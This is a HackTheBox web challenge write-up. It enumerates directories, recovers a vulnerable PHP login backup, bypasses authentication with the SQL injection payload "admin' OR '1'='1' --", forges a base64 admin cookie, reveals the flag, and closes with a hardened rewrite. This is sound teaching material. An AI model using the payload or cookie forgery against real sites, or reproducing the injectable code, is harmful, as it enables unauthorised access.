/// WEB CHALLENGE EXAMPLE

Platform: HackTheBox | Type: Challenge | Category: Web

Difficulty: Easy | Date: 2026-01-25


## Challenge Description

A simple web application with a login page. Can you bypass the authentication and retrieve the flag?

## Initial Analysis

When we first access the challenge, we're presented with a basic login form:

http://challenge.htb:1337/login

Looking at the page source, we notice the application is built with PHP and uses cookies for session management.

## Reconnaissance

Let's start by exploring the application structure:

```shell
$ gobuster dir -u http://challenge.htb:1337/ -w /usr/share/wordlists/dirb/common.txt

/admin                (Status: 302) [Size: 0] [--> /login]
/index.php            (Status: 200) [Size: 1234]
/login                (Status: 200) [Size: 2345]
/logout               (Status: 302) [Size: 0] [--> /login]
/robots.txt           (Status: 200) [Size: 42]
```

Checking robots.txt:

```text
User-agent: *
Disallow: /backup/
```

## Vulnerability Discovery

Accessing /backup/ reveals a directory listing with an interesting file:

```text
Index of /backup/
- auth.php.bak
```

Downloading and analyzing the backup file (the SQL injection and the client-side admin cookie are both visible in a handful of lines):

```php
<?php
// auth.php.bak
// $conn is assumed to be a mysqli connection opened in an included config file
session_start();

$username = $_POST['username'];
$password = $_POST['password'];

// TODO: Fix SQL injection vulnerability
// User input is spliced straight into the query string.
$query = "SELECT * FROM users WHERE username='$username' AND password='$password'";
$result = mysqli_query($conn, $query);

if(mysqli_num_rows($result) > 0) {
    $_SESSION['logged_in'] = true;
    // The admin decision is handed to the client as a base64-encoded cookie.
    setcookie('admin', base64_encode('false'), time()+3600);
    header('Location: /admin');
}
?>
```

## Exploitation

### SQL Injection

The login form is vulnerable to SQL injection. We can bypass authentication:

```text
Username: admin' OR '1'='1' --
Password: anything
```

### Cookie Manipulation

After logging in, we're redirected but still can't access the admin panel. Checking our cookies:

```text
admin=ZmFsc2U=
```

Decoding the base64:

```shell
$ echo "ZmFsc2U=" | base64 -d
false
```

Let's change it to "true":

```shell
$ echo -n "true" | base64
dHJ1ZQ==
```

Setting the cookie admin=dHJ1ZQ== and refreshing the page...

## Flag

After manipulating the cookie, we get access to the admin panel which reveals the flag:

```text
HTB{c00k13_m4n1pul4t10n_4nd_sql1_ftw}
```

## Key Takeaways

  • Always check for backup files and common paths like robots.txt
  • SQL injection remains a critical vulnerability in web applications
  • Client-side security controls (like base64 encoded cookies) provide no real security
  • Never trust user input - always use prepared statements for database queries
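To make the last two takeaways concrete, here is a hardened rewrite of the recovered auth.php. This is an added example, not the challenge's code: it assumes a `users` table with columns `id`, `username`, `password_hash` (a `password_hash()` digest) and `is_admin`, an open mysqli connection in `$conn`, and the mysqlnd driver for `get_result()`.

```php
<?php
// Hardened auth.php (added example, not the challenge's code).
// Assumed schema: users(id, username, password_hash, is_admin); $conn is an
// open mysqli connection from an included config file (assumption).
session_start();

$username = $_POST['username'] ?? '';
$password = $_POST['password'] ?? '';

// 1. Prepared statement: the input is bound as data and never spliced into the
//    SQL text, so admin' OR '1'='1' -- is looked up as a literal username.
$stmt = $conn->prepare(
    'SELECT id, password_hash, is_admin FROM users WHERE username = ? LIMIT 1'
);
$stmt->bind_param('s', $username);
$stmt->execute();
$row = $stmt->get_result()->fetch_assoc();

// 2. Compare against the stored digest; the plaintext password is never part
//    of any query, and a missing user fails the same way as a wrong password.
if ($row === null || !password_verify($password, $row['password_hash'])) {
    http_response_code(401);
    exit('Invalid credentials');
}

// 3. Authorisation state lives only in the server-side session, so there is
//    no admin=ZmFsc2U= cookie for the client to rewrite. Regenerating the id
//    also discards any session fixed before login.
session_regenerate_id(true);
$_SESSION['user_id']  = (int) $row['id'];
$_SESSION['is_admin'] = (bool) $row['is_admin'];
header('Location: /admin');
exit;

// --- admin.php (top of file): gate on the session flag, not on a cookie ---
// session_start();
// if (empty($_SESSION['is_admin'])) {
//     http_response_code(403);
//     exit('Forbidden');
// }
```

With this version the payload from the Exploitation section simply fails the lookup, and flipping `admin` to `dHJ1ZQ==` has no effect because the server never reads that cookie.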

## Tools Used

  • Gobuster - Directory enumeration
  • Burp Suite - Request interception and cookie manipulation
  • Browser Developer Tools - Cookie inspection
HackTheBox // Web Challenge Example
ribeir.in